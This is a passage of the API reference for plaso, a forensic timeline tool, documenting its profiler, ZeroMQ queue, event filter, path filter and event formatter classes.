StartTiming(profile_name)Starts timing CPU time.



Parameters profile_name (str) – name of the profile to sample.

StopTiming(profile_name)Stops timing CPU time.


class plaso.engine.profilers.MemoryProfiler(identifier, configuration)Bases: plaso.engine.profilers.SampleFileProfiler

The memory profiler.

Sample(profile_name, used_memory)Takes a sample for profiling.

Parameters

• profile_name (str) – name of the profile to sample.

• used_memory (int) – amount of used memory in bytes.

class plaso.engine.profilers.ProcessingProfiler(identifier, configuration)Bases: plaso.engine.profilers.CPUTimeProfiler

The processing profiler.

class plaso.engine.profilers.SampleFileProfiler(identifier, configuration)Bases: object

Shared functionality for sample file-based profilers.

classmethod IsSupported()Determines if the profiler is supported.

Returns True if the profiler is supported.

Return type bool

Start()Starts the profiler.

Stop()Stops the profiler.

class plaso.engine.profilers.SerializersProfiler(identifier, configuration)Bases: plaso.engine.profilers.CPUTimeProfiler

The serializers profiler.

class plaso.engine.profilers.StorageProfiler(identifier, configuration)Bases: plaso.engine.profilers.SampleFileProfiler

The storage profiler.

Sample(profile_name, operation, description, data_size, compressed_data_size)Takes a sample of data read or written for profiling.

Parameters

• profile_name (str) – name of the profile to sample.

• operation (str) – operation, either ‘read’ or ‘write’.

• description (str) – description of the data read.

• data_size (int) – size of the data read in bytes.

• compressed_data_size (int) – size of the compressed data read in bytes.



StartTiming(profile_name)Starts timing CPU time.


StopTiming(profile_name)Stops timing CPU time.


class plaso.engine.profilers.TaskQueueProfiler(identifier, configuration)Bases: plaso.engine.profilers.SampleFileProfiler

The task queue profiler.

Sample(tasks_status)Takes a sample of the status of queued tasks for profiling.

Parameters tasks_status (TasksStatus) – status information about tasks.

class plaso.engine.profilers.TasksProfiler(identifier, configuration)Bases: plaso.engine.profilers.SampleFileProfiler

The tasks profiler.

Sample(task, status)Takes a sample of the status of a task for profiling.

Parameters

• task (Task) – a task.

• status (str) – status.

plaso.engine.single_process module

The single process processing engine.

class plaso.engine.single_process.SingleProcessEngineBases: plaso.engine.engine.BaseEngine

Class that defines the single process engine.

ProcessSources(session, source_path_specs, storage_writer, resolver_context, process-ing_configuration, status_update_callback=None)

Processes the sources.

Parameters

• session (Session) – session in which the sources are processed.


• storage_writer (StorageWriter) – storage writer for a session storage.

• resolver_context (dfvfs.Context) – resolver context.

• processing_configuration (ProcessingConfiguration) – processingconfiguration.

• status_update_callback (Optional[function]) – callback function for sta-tus updates.

Returns processing status.



Return type ProcessingStatus

plaso.engine.tagging_file module

Tagging file.

class plaso.engine.tagging_file.TaggingFile(path)Bases: object

Tagging file that defines one or more event tagging rules.

GetEventTaggingRules()Retrieves the event tagging rules from the tagging file.

Returns

tagging rules, that consists of one or more filter objects per label.

Return type dict[str, FilterObject]

Raises TaggingFileError – if a filter expression cannot be compiled.

plaso.engine.worker module

The event extraction worker.

class plaso.engine.worker.EventExtractionWorker(parser_filter_expression=None)Bases: object

Event extraction worker.

The event extraction worker determines which parsers are suitable for parsing a particular file entry or datastream. The parsers extract relevant data from file system and or file content data. All extracted data is passedto the parser mediator for further processing.

last_activity_timestamptimestamp received that indicates the last time activity was observed.

Type int

processing_statushuman readable status indication such as: ‘Extracting’, ‘Hashing’.

Type str

GetAnalyzerNames()Gets the names of the active analyzers.

Returns names of active analyzers.


ProcessPathSpec(mediator, path_spec, excluded_find_specs=None)Processes a path specification.

Parameters

• mediator (ParserMediator) – mediates the interactions between parsers and othercomponents, such as storage and abort signals.


• excluded_find_specs (Optional[list[dfvfs.FindSpec]]) – find speci-fications that are excluded from processing.



SetAnalyzersProfiler(analyzers_profiler)Sets the parsers profiler.

Parameters analyzers_profiler (AnalyzersProfiler) – analyzers profile.

SetExtractionConfiguration(configuration)Sets the extraction configuration settings.

Parameters configuration (ExtractionConfiguration) – extraction configuration.

SetProcessingProfiler(processing_profiler)Sets the processing profiler.

Parameters processing_profiler (ProcessingProfiler) – processing profile.

SignalAbort()Signals the extraction worker to abort.

plaso.engine.yaml_filter_file module

YAML-based filter file.

class plaso.engine.yaml_filter_file.YAMLFilterFileBases: object

YAML-based filter file.

A YAML-based filter file contains one or more path filters. description: Include filter with Linux paths. type:include path_separator: ‘/’ paths: - ‘/usr/bin’

Where: * description, is an optional description of the purpose of the path filter; * type, defines the filter type,which can be “include” or “exclude”; * path_separator, defines the path segment separator, which is “/” bydefault; * paths, defines regular expression of paths to filter on.

Note that the regular expression need to be defined per path segment, for example to filter “/usr/bin/echo” and“/usr/sbin/echo” the following expression could be defined “/usr/(bin|sbin)/echo”.

Note that when the path segment separator is defined as “” it needs to be escaped as “", since “” is used by theregular expression as escape character.

A path may contain path expansion attributes, for example: %{SystemRoot}\System32

ReadFromFile(path)Reads the path filters from the YAML-based filter file.

Parameters path (str) – path to a filter file.

Returns path filters.

Return type list[PathFilter]

plaso.engine.zeromq_queue module

ZeroMQ implementations of the Plaso queue interface.

class plaso.engine.zeromq_queue.ZeroMQBufferedQueue(buffer_timeout_seconds=2,buffer_max_size=10000,delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed', port=None,timeout_seconds=5)



Bases: plaso.engine.zeromq_queue.ZeroMQQueue

Parent class for buffered Plaso queues.

Buffered queues use a regular Python queue to store items that are pushed or popped from the queue withoutblocking on underlying ZeroMQ operations.

This class should not be instantiated directly, a subclass should be instantiated instead.

Close(abort=False)Closes the queue.


Raises

• QueueAlreadyClosed – if the queue is not started, or has already been closed.

• RuntimeError – if closed or terminate event is missing.

Empty()Removes all items from the internal buffer.

class plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueue(buffer_timeout_seconds=2,buffer_max_size=10000,delay_open=True,linger_seconds=10,maxi-mum_items=1000,name='Unnamed',port=None, time-out_seconds=5)

Bases: plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue

A Plaso queue backed by a ZeroMQ REP socket that binds to a port.

This queue may only be used to pop items, not to push.

SOCKET_CONNECTION_TYPE = 1

class plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue(buffer_timeout_seconds=2,buffer_max_size=10000,delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed',port=None, time-out_seconds=5)

Bases: plaso.engine.zeromq_queue.ZeroMQBufferedQueue

Parent class for buffered Plaso queues backed by ZeroMQ REP sockets.


Instances of this class or subclasses may only be used to push items, not to pop.

PopItem()Pops an item of the queue.

Provided for compatibility with the API, but doesn’t actually work.

Raises WrongQueueType – As Pop is not supported by this queue.



PushItem(item, block=True)Push an item on to the queue.

If no ZeroMQ socket has been created, one will be created the first time this method is called.

Parameters

• item (object) – item to push on the queue.

• block (Optional[bool]) – whether the push should be performed in blocking ornon-blocking mode.

Raises

• QueueAlreadyClosed – if the queue is closed.

• QueueFull – if the internal buffer was full and it was not possible to push the item tothe buffer within the timeout.

• RuntimeError – if closed event is missing.

class plaso.engine.zeromq_queue.ZeroMQPullConnectQueue(delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed',port=None, time-out_seconds=5)

Bases: plaso.engine.zeromq_queue.ZeroMQPullQueue

A Plaso queue backed by a ZeroMQ PULL socket that connects to a port.



class plaso.engine.zeromq_queue.ZeroMQPullQueue(delay_open=True, linger_seconds=10,maximum_items=1000,name='Unnamed', port=None, time-out_seconds=5)


Parent class for Plaso queues backed by ZeroMQ PULL sockets.


Instances of this class or subclasses may only be used to pop items, not to push.

PopItem()Pops an item off the queue.


Returns item from the queue.

Return type object

Raises

• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping anitem.

• QueueEmpty – if the queue is empty, and no item could be popped within the queuetimeout.


• zmq.error.ZMQError – if a ZeroMQ error occurs.



PushItem(item, block=True)Pushes an item on to the queue.


Parameters



Raises WrongQueueType – As Push is not supported this queue.

class plaso.engine.zeromq_queue.ZeroMQPushBindQueue(delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed', port=None,timeout_seconds=5)

Bases: plaso.engine.zeromq_queue.ZeroMQPushQueue

A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port.

This queue may only be used to push items, not to pop.


class plaso.engine.zeromq_queue.ZeroMQPushQueue(delay_open=True, linger_seconds=10,maximum_items=1000,name='Unnamed', port=None, time-out_seconds=5)


Parent class for Plaso queues backed by ZeroMQ PUSH sockets.


Instances of this class or subclasses may only be used to push items, not to pop.

PopItem()Pops an item of the queue.


Raises WrongQueueType – As Pull is not supported this queue.

PushItem(item, block=True)Push an item on to the queue.


Parameters



Raises

• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while pushing anitem.

• QueueFull – if it was not possible to push the item to the queue within the timeout.

• RuntimeError – if terminate event is missing.



• zmq.error.ZMQError – if a ZeroMQ specific error occurs.

class plaso.engine.zeromq_queue.ZeroMQQueue(delay_open=True, linger_seconds=10,maximum_items=1000, name='Unnamed',port=None, timeout_seconds=5)

Bases: plaso.engine.plaso_queue.Queue

Interface for a ZeroMQ backed queue.

namename to identify the queue.

Type str

portTCP port that the queue is connected or bound to. If the queue is not yet bound or connected to a port, thisvalue will be None.

Type int

timeout_secondsnumber of seconds that calls to PopItem and PushItem may block for, before returning queue.QueueEmpty.

Type int

Close(abort=False)Closes the queue.


Raises

• QueueAlreadyClosed – if the queue is not started, or has already been closed.


IsBound()Checks if the queue is bound to a port.

IsConnected()Checks if the queue is connected to a port.

IsEmpty()Checks if the queue is empty.

ZeroMQ queues don’t have a concept of “empty” - there could always be messages on the queue that aproducer or consumer is unaware of. Thus, the queue is never empty, so we return False. Note that it ispossible that a queue is unable to pop an item from a queue within a timeout, which will cause PopItem toraise a QueueEmpty exception, but this is a different condition.

Returns False, to indicate the the queue isn’t empty.

Return type bool

Open()Opens this queue, causing the creation of a ZeroMQ socket.

Raises QueueAlreadyStarted – if the queue is already started, and a socket already exists.

abstract PopItem()Pops an item off the queue.


Return type object



Raises QueueEmpty – if the queue is empty, and no item could be popped within the queuetimeout.

abstract PushItem(item, block=True)Pushes an item on to the queue.

Parameters



Raises QueueAlreadyClosed – if the queue is closed.

SOCKET_CONNECTION_BIND = 1

SOCKET_CONNECTION_CONNECT = 2

SOCKET_CONNECTION_TYPE = None

class plaso.engine.zeromq_queue.ZeroMQRequestConnectQueue(delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed',port=None, time-out_seconds=5)

Bases: plaso.engine.zeromq_queue.ZeroMQRequestQueue

A Plaso queue backed by a ZeroMQ REQ socket that connects to a port.



class plaso.engine.zeromq_queue.ZeroMQRequestQueue(delay_open=True,linger_seconds=10,maximum_items=1000,name='Unnamed', port=None,timeout_seconds=5)


Parent class for Plaso queues backed by ZeroMQ REQ sockets.


Instances of this class or subclasses may only be used to pop items, not to push.

PopItem()Pops an item off the queue.



Return type object

Raises

• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping anitem.

• QueueEmpty – if the queue is empty, and no item could be popped within the queuetimeout.

• RuntimeError – if terminate event is missing.



• zmq.error.ZMQError – if an error occurs in ZeroMQ.

PushItem(item, block=True)Pushes an item on to the queue.


Parameters



Raises WrongQueueType – As Push is not supported this queue.

Module contents

5.1.6 plaso.filters package

Submodules

plaso.filters.event_filter module

The event filter.

class plaso.filters.event_filter.EventObjectFilterBases: plaso.filters.interface.FilterObject

Event filter.

CompileFilter(filter_expression)Compiles the filter expression.

The filter expression contains an object filter expression.

Parameters filter_expression (str) – filter expression.

Raises ParseError – if the filter expression cannot be parsed.

Match(event, event_data, event_data_stream, event_tag)Determines if an event matches the filter.

Parameters




• event_tag (EventTag) – event tag.

Returns True if the event matches the filter, False otherwise.

Return type bool



plaso.filters.expression_parser module

Event filter expression parser.

class plaso.filters.expression_parser.EventFilterExpressionParserBases: object

Event filter expression parser.

Examples of valid syntax: size is 40 (name contains “Program Files” AND hash.md5 is “123abc”) @im-ported_modules (num_symbols = 14 AND symbol.name is “FindWindow”)

HexEscape(string, match, **unused_kwargs)Converts a hex escaped string.

Note that this function is used as a callback by _GetNextToken.

Returns next state, which is None.

Return type str

Raises ParseError – if the string is not hex escaped.

InsertArg(string='', **unused_kwargs)Inserts an argument into the current expression.

Parameters string (Optional[str]) – argument string.

Returns

state or None if the argument could not be added to the current expression.

Return type str

Raises ParseError – if the operator does not support negation.

InsertFloatArg(string='', **unused_kwargs)Inserts a floating-point argument into the current expression.

Parameters string (Optional[str]) – argument string that contains a floating-pointvalue.

Returns


Return type str

Raises ParseError – TBD.

InsertInt16Arg(string='', **unused_kwargs)Inserts a hexadecimal integer argument into the current expression.

Parameters string (Optional[str]) – argument string that contains an integer value for-matted in hexadecimal.

Returns


Return type str

Raises ParseError – if string does not contain a valid base16 formatted integer.

InsertIntArg(string='', **unused_kwargs)Inserts a decimal integer argument into the current expression.



Parameters string (Optional[str]) – argument string that contains an integer value for-matted in decimal.

Returns


Return type str

Raises ParseError – if string does not contain a valid integer.

Parse(expression)Parses an event filter expression.

Parameters expression (str) – event filter expression.

Returns expression.

Return type Expression

class plaso.filters.expression_parser.Token(state, regex, actions, next_state)Bases: object

An event filter expression parser token.

actionslist of method names in the EventFilterExpressionParser to call.

Type list[str]

next_statenext state we transition to if this Token matches.

Type str

stateparser state within the token should be applied or None if the token should be applied regardless of theparser state.

Type str

CompareExpression(expression)Compares the token against an expression string.

Parameters expression (str) – expression string.

Returns

the regular expression match object if the expression string matches the token or Noneif no match.

Return type re.Match

plaso.filters.expressions module

The event filter expression parser expression classes.

class plaso.filters.expressions.BinaryExpression(operator='')Bases: plaso.filters.expressions.Expression

An event filter parser expression which takes two other expressions.

AddOperands(lhs, rhs)Adds an operand.

Parameters



• lhs (Expression) – left hand side expression.

• rhs (Expression) – right hand side expression.

Raises ParseError – if either left hand side or right hand side expression is not an instanceof Expression.

Compile()Compiles the expression into a filter.

Returns filter object corresponding the expression.

Return type Filter

Raises ParseError – if the operator is not supported.

__repr__()Retrieves a string representation of the object for debugging.

class plaso.filters.expressions.EventExpressionBases: plaso.filters.expressions.Expression

Event expression.



Return type Filter

Raises ParseError – if the operator is missing or unknown.

Negate()Reverses the logic of (negates) the expression.

__repr__()Retrieves a string representation of the object for debugging.

class plaso.filters.expressions.ExpressionBases: object

An event filter parser expression.

attributeattribute or None if not set.

Type str

argsarguments.

Type list[str]

number_of_argsexpected number of arguments.

Type int

operatoroperator or None if not set.

Type str

AddArg(argument)Adds a new argument to this expression.



Parameters argument (str) – argument to add.

Returns True if the argument is the last argument, False otherwise.

Return type bool

Raises ParseError – If there are too many arguments.

abstract Compile()Compiles the expression into a filter.


Return type Filter

SetAttribute(attribute)Sets the attribute.

Parameters attribute (str) – attribute, or None if not set.

SetOperator(operator)Set the operator.

Parameters operator (str) – operator, such as “and” or “&&”, or None if not set.

attribute = None

class plaso.filters.expressions.IdentityExpressionBases: plaso.filters.expressions.Expression

An event filter parser expression which always evaluates to True.


Returns filter object which always evaluates to True.

Return type IdentityFilter

plaso.filters.file_entry module

File entry filters.

class plaso.filters.file_entry.DateTimeFileEntryFilterBases: plaso.filters.file_entry.FileEntryFilter

Date and time-based file entry filter.

AddDateTimeRange(time_value, start_time_string=None, end_time_string=None)Adds a date time filter range.

The time strings are formatted as: YYYY-MM-DD hh:mm:ss.######[+-]##:## Where # are numeric digitsranging from 0 to 9 and the seconds fraction can be either 3 or 6 digits. The time of day, seconds fractionand timezone offset are optional. The default timezone is UTC.

Parameters

• time_value (str) – time value, such as, atime, ctime, crtime, dtime, bkup and mtime.

• start_time_string (str) – start date and time value string.

• end_time_string (str) – end date and time value string.

Raises ValueError – If the filter is badly formed.



Matches(file_entry)Compares the file entry against the filter.

Parameters file_entry (dfvfs.FileEntry) – file entry to compare.

Returns

True if the file entry matches the filter, False if not or None if the filter does not apply.

Return type bool

Print(output_writer)Prints a human readable version of the filter.

Parameters output_writer (CLIOutputWriter) – output writer.

class plaso.filters.file_entry.ExtensionsFileEntryFilter(extensions)Bases: plaso.filters.file_entry.FileEntryFilter

Extensions-based file entry filter.



Returns


Return type bool



class plaso.filters.file_entry.FileEntryFilterBases: object

File entry filter interface.

abstract Matches(file_entry)Compares the file entry against the filter.


Returns


Return type bool

abstract Print(output_writer)Prints a human readable version of the filter.


class plaso.filters.file_entry.FileEntryFilterCollectionBases: object

Collection of file entry filters.

AddFilter(file_entry_filter)Adds a file entry filter to the collection.

Parameters file_entry_filter (FileEntryFilter) – file entry filter.



HasFilters()Determines if filters are defined.

Returns True if filters are defined.

Return type bool

Matches(file_entry)Compares the file entry against the filter collection.


Returns

True if the file entry matches one of the filters. If no filters are provided or applicablethe result will be True.

Return type bool



class plaso.filters.file_entry.NamesFileEntryFilter(names)Bases: plaso.filters.file_entry.FileEntryFilter

Names-based file entry filter.



Returns True if the file entry matches the filter.

Return type bool



class plaso.filters.file_entry.SignaturesFileEntryFilter(specification_store, sig-nature_identifiers)

Bases: plaso.filters.file_entry.FileEntryFilter

Signature-based file entry filter.



Returns


Return type bool





plaso.filters.filters module

The event filter expression parser filter classes.

class plaso.filters.filters.AndFilter(arguments=None)Bases: plaso.filters.filters.Filter

A filter that performs a boolean AND on the arguments.

Note that if no conditions are passed, all objects will pass.

Matches(event, event_data, event_data_stream, event_tag)Determines if the event, data and tag match the filter.

Parameters

• event (EventObject) – event to compare against the filter.

• event_data (EventData) – event data to compare against the filter.


• event_tag (EventTag) – event tag to compare against the filter.

Returns True if the event, data and tag match the filter, False otherwise.

Return type bool

class plaso.filters.filters.BinaryOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.Operator

Interface for binary operators.

left_operandleft hand operand.

Type object

right_operandright hand operand.

Type object

abstract Matches(event, event_data, event_data_stream, event_tag)Determines if the event, data and tag match the filter.

Parameters






Return type bool

class plaso.filters.filters.Contains(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Operator to determine if a value contains another value.



class plaso.filters.filters.EqualsOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Equals (==) operator.

class plaso.filters.filters.Filter(arguments=None)Bases: object

Filter interface.

argsarguments provided to the filter.

Type list[object]


Parameters






Return type bool

class plaso.filters.filters.GenericBinaryOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.BinaryOperator

Shared functionality for common binary operators.

FlipBool()Negates the internal boolean value attribute.


Parameters






Return type bool

class plaso.filters.filters.GreaterEqualOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Greater than or equals (>=) operator.

class plaso.filters.filters.GreaterThanOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Greater than (>) operator.



class plaso.filters.filters.IdentityFilter(arguments=None)Bases: plaso.filters.filters.Operator

A filter which always evaluates to True.


Parameters






Return type bool

class plaso.filters.filters.InSet(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Operator to determine if a value is part of another value.

class plaso.filters.filters.LessEqualOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Less than or equals (<=) operator.

class plaso.filters.filters.LessThanOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Less than (<) operator.

class plaso.filters.filters.NotEqualsOperator(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Not equals (!=) operator.

class plaso.filters.filters.Operator(arguments=None)Bases: plaso.filters.filters.Filter

Interface for filters that represent operators.


Parameters






Return type bool

class plaso.filters.filters.OrFilter(arguments=None)Bases: plaso.filters.filters.Filter

A filter that performs a boolean OR on the arguments.



Note that if no conditions are passed, all objects will pass.


Parameters






Return type bool

class plaso.filters.filters.Regexp(arguments=None, **kwargs)Bases: plaso.filters.filters.GenericBinaryOperator

Operator to determine if a value matches a regular expression.

compiled_recompiled regular expression.

Type ???

class plaso.filters.filters.RegexpInsensitive(arguments=None, **kwargs)Bases: plaso.filters.filters.Regexp

Operator to determine if a value matches a regular expression.

plaso.filters.interface module

Filter interface.

class plaso.filters.interface.FilterObjectBases: object

Filter object interface.

abstract CompileFilter(filter_expression)Compiles the filter expression.

Parameters filter_expression (str) – filter expression.

Raises WrongPlugin – if the filter could not be compiled.

Match(event, event_data, event_data_stream, event_tag)Determines if an event matches the filter.

Parameters





Returns True if the event matches the filter.

Return type bool



property fieldsname of the fields.

Type list[str]

property filter_expressioncompiled filter expression or None.

Type object

property filter_namename of the filter.

Type str

property limitrow limit.

Type int

property separatoroutput field separator.

Type str

plaso.filters.parser_filter module

Helper for parser and plugin filter expressions.

class plaso.filters.parser_filter.ParserFilterExpressionHelperBases: object

Helper for parser and plugin filter expressions.

A parser filter expression is a comma separated value string that denotes which parsers and plugins should beused. Each element can contain either:

• The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (seedata/presets.yaml for the default presets).

• The name of a parser (case insensitive), for example ‘msiecf’.

• The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’.

If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsersand plugins, otherwise the element will be included.

ExpandPresets(presets_manager, expression)Expands all presets in a parser filter expression.

Parameters

• presets_manager (ParserPresetsManager) – a parser preset manager, that isused to resolve which parsers and/or plugins are defined by presets.

• expression (str) – parser filter expression, where None represents all parsers andplugins.

A parser filter expression is a comma separated value string that denotes which parsers andplugins should be used. Each element can be either:

– The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins(see data/presets.yaml for the default presets).

– The name of a parser (case insensitive), for example ‘msiecf’.



– The name of a plugin, prefixed with the parser name and a ‘/’, for example‘sqlite/chrome_history’.

If the element begins with an exclamation mark (‘!’) the item will be excluded from theset of enabled parsers and plugins, otherwise the element will be included.

Returns

a parser filter expression where presets have been expanded or None to represent allparsers and plugins.

Return type str

SplitExpression(expression)Determines the excluded and included elements in an expression string.

This method will not expand presets, and preset names are treated like parser names.

Parameters expression (str) – parser filter expression, where None represents all parsersand plugins.

A parser filter expression is a comma separated value string that denotes which parsers andplugins should be used. Each element can be either:

• The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins(see data/presets.yaml for the default presets).

• The name of a parser (case insensitive), for example ‘msiecf’.

• The name of a plugin, prefixed with the parser name and a ‘/’, for example‘sqlite/chrome_history’.

If the element begins with an exclamation mark (‘!’) the item will be excluded from the setof enabled parsers and plugins, otherwise the element will be included.

Returns

contains:

excludes (dict[str, set[str]]): excluded presets, plugins and presets. Dictionary keysare preset and/or parser names, and values are sets containing plugin names to enablefor a parser or an asterisk character (‘*’) to represet all plugins, or that no specificplugins were specified.

includes (dict[str, set[str]]): included presets, parsers and plugins. Dictionary keysare preset and/or parser names, and values are sets containing plugin names to enablefor a parser or an asterisk character (‘*’) to represet all plugins, or that no specificplugins were specified.

Return type tuple

plaso.filters.path_filter module

A scan tree-based path filter implementation.

The scan tree is a tree based on multiple paths that contains the path segments per node. The most significant pathsegment is at the root and therefore compared first. More information can be found here: https://github.com/libyal/libsigscan/wiki/Internals#scanning-tree-based-signature-scanning

The scan tree is used in the filter to filter provided paths.


https://github.com/libyal/libsigscan/wiki/Internals#scanning-tree-based-signature-scanning

https://github.com/libyal/libsigscan/wiki/Internals#scanning-tree-based-signature-scanning


class plaso.filters.path_filter.PathFilterScanTree(paths, case_sensitive=True,path_segment_separator='/')

Bases: object

Path filter scan tree.

CheckPath(path, path_segment_separator=None)Checks if a path matches the scan tree-based path filter.

Parameters

• path (str) – path.

• path_segment_separator (Optional[str]) – path segment separator, whereNone defaults to the path segment separator that was set when the path filter scan tree wasinitialized.

Returns True if the path matches the filter, False otherwise.

Return type bool

class plaso.filters.path_filter.PathFilterScanTreeNode(path_segment_index)Bases: object

Class that implements a path filter scan tree node.

The path filter scan tree node defines the path segments for a specific path segment index to filter. Each pathsegment will point to a scan object that indicates the next part of the path filter. A default value indicates thescan object to use next when there was no match.

default_valuethe default scan object, which is either a scan tree sub node or a path.

Type str|PathFilterScanTreeNode

parentthe parent path filter scan tree node or None if the node has no parent.

Type PathFilterScanTreeNode

path_segment_indexpath segment index represented by the node.

Type int

AddPathSegment(path_segment, scan_object)Adds a path segment.

Parameters

• path_segment (str) – path segment.

• scan_object (str|PathFilterScanTreeNode) – a scan object, which is eithera scan tree sub node or a path.

Raises ValueError – if the node already contains a scan object for the path segment.

GetScanObject(path_segment)Retrieves the scan object for a specific path segment.

Parameters path_segment (str) – path segment.

Returns

a scan object, which is either a scan tree sub node, a path or the default value.

Return type str|PathFilterScanTreeNode



SetDefaultValue(scan_object)Sets the default (non-match) value.

Parameters scan_object (str|PathFilterScanTreeNode) – a scan object, which iseither a scan tree sub node or a path.

Raises

• TypeError – if the scan object is of an unsupported type.

• ValueError – if the default value is already set.

ToDebugString(indentation_level=1)Converts the path filter scan tree node into a debug string.

Parameters indentation_level (int) – text indentation level.

Returns debug string representing the path filter scan tree node.

Return type str

property path_segmentspath segments.

Type list[str]

Module contents

5.1.7 plaso.formatters package

Submodules

plaso.formatters.asl module

The Apple System Log (ASL) event formatter.

class plaso.formatters.asl.ASLFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for an Apple System Log (ASL) log event.

DATA_TYPE = 'mac:asl:event'

FORMAT_STRING_PIECES = ['MessageID: {message_id}', 'Level: {level}', 'User ID: {user_sid}', 'Group ID: {group_id}', 'Read User: {read_uid}', 'Read Group: {read_gid}', 'Host: {computer_name}', 'Sender: {sender}', 'Facility: {facility}', 'Message: {message}', '{extra_information}']

FORMAT_STRING_SHORT_PIECES = ['Host: {host}', 'Sender: {sender}', 'Facility: {facility}']

GetMessages(formatter_mediator, event_data)Determines the formatted message strings for the event data.

Parameters

• formatter_mediator (FormatterMediator) – mediates the interactions be-tween formatters and other components, such as storage and Windows EventLog re-sources.


Returns formatted message string and short message string.

Return type tuple(str, str)

Raises WrongFormatter – if the event data cannot be formatted by the formatter.



plaso.formatters.chrome module

The Google Chrome history event formatters.

class plaso.formatters.chrome.ChromePageVisitedFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Chrome page visited event.

DATA_TYPE = 'chrome:history:page_visited'

FORMAT_STRING_PIECES = ['{url}', '({title})', '[count: {typed_count}]', 'Visit from: {from_visit}', 'Visit Source: [{visit_source}]', 'Type: [{page_transition}]', '{extra}']

FORMAT_STRING_SHORT_PIECES = ['{url}', '({title})']


Parameters






plaso.formatters.chrome_preferences module

The Google Chrome Preferences file event formatter.

class plaso.formatters.chrome_preferences.ChromeContentSettingsExceptionsFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Chrome content_settings exceptions event.

DATA_TYPE = 'chrome:preferences:content_settings:exceptions'

FORMAT_STRING_PIECES = ['Permission {permission}', 'used by {subject}']

FORMAT_STRING_SHORT_PIECES = ['Permission {permission}', 'used by {subject}']


Parameters








plaso.formatters.default module

The default event formatter.

class plaso.formatters.default.DefaultFormatterBases: plaso.formatters.interface.EventFormatter

Formatter for events that do not have any defined formatter.

DATA_TYPE = 'event'

FORMAT_STRING = '<WARNING DEFAULT FORMATTER> Attributes: {attribute_driven}'

FORMAT_STRING_SHORT = '<DEFAULT> {attribute_driven}'


Parameters





plaso.formatters.file_system module

The file system stat event formatter.

class plaso.formatters.file_system.FileStatEventFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

The file system stat event formatter.

DATA_TYPE = 'fs:stat'

FORMAT_STRING_PIECES = ['{display_name}', 'Type: {file_entry_type}', '({unallocated})']

FORMAT_STRING_SHORT_PIECES = ['{filename}']


Parameters






class plaso.formatters.file_system.NTFSFileStatEventFormatterBases: plaso.formatters.file_system.FileStatEventFormatter

The NTFS file system stat event formatter.



DATA_TYPE = 'fs:stat:ntfs'

FORMAT_STRING_PIECES = ['{display_name}', 'File reference: {file_reference}', 'Attribute name: {attribute_name}', 'Name: {name}', 'Parent file reference: {parent_file_reference}', '({unallocated})', 'Path hints: {path_hints}']

FORMAT_STRING_SHORT_PIECES = ['{filename}', '{file_reference}', '{attribute_name}']


Parameters






class plaso.formatters.file_system.NTFSUSNChangeEventFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

The NTFS USN change event formatter.

DATA_TYPE = 'fs:ntfs:usn_change'

FORMAT_STRING_PIECES = ['{filename}', 'File reference: {file_reference}', 'Parent file reference: {parent_file_reference}', 'Update source: {update_source}', 'Update reason: {update_reason}']

FORMAT_STRING_SHORT_PIECES = ['{filename}', '{file_reference}', '{update_reason}']


Parameters






plaso.formatters.firefox module

The Mozilla Firefox history event formatter.

class plaso.formatters.firefox.FirefoxPageVisitFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

The Firefox page visited event formatter.

DATA_TYPE = 'firefox:places:page_visited'

FORMAT_STRING_PIECES = ['{url}', '({title})', '[count: {visit_count}]', 'Host: {host}', '{extra_string}']

FORMAT_STRING_SHORT_PIECES = ['URL: {url}']




Parameters






plaso.formatters.gdrive module

The Google Drive snapshots event formatter.

class plaso.formatters.gdrive.GDriveCloudEntryFormatterBases: plaso.formatters.interface.ConditionalEventFormatter

Formatter for a Google Drive snapshot cloud event.

DATA_TYPE = 'gdrive:snapshot:cloud_entry'

FORMAT_STRING_PIECES = ['File Path: {path}', '[{shared}]', 'Size: {size}', 'URL: {url}', 'Type: {document_type}']

FORMAT_STRING_SHORT_PIECES = ['{path}']


Parameters






plaso.formatters.interface module

This file contains the event formatters interface classes.

The l2t_csv and other formats are dependent on a message field, referred to as description_long and description_shortin l2t_csv.

Plaso no longer stores these field explicitly.

A formatter, with a format string definition, is used to convert the event object values into a formatted string that issimilar to the description_long and description_short field.



class plaso.formatters.interface.ConditionalEventFormatterBases: plaso.formatters.interface.EventFormatter

Base class to conditionally format event data using format string pieces.

Define the (long) format string and the short format string by defining FORMAT_STRING_PIECES and FOR-MAT_STRING_SHORT_PIECES. The syntax of the format strings pieces is similar to of the event formatter(EventFormatter). Every format string piece should contain a single attribute name or none.

FORMAT_STRING_SEPARATOR is used to control the string which the separate string pieces should bejoined. It contains a space by default.

